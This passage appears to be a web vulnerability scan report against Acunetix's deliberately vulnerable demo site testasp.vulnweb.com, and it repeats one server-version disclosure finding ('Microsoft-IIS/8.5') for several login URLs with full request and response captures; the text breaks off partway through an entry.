GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=24 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=25 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:56 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=26 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:56 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=27 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:56 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=28 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=29 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=3 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:49 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=30 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" 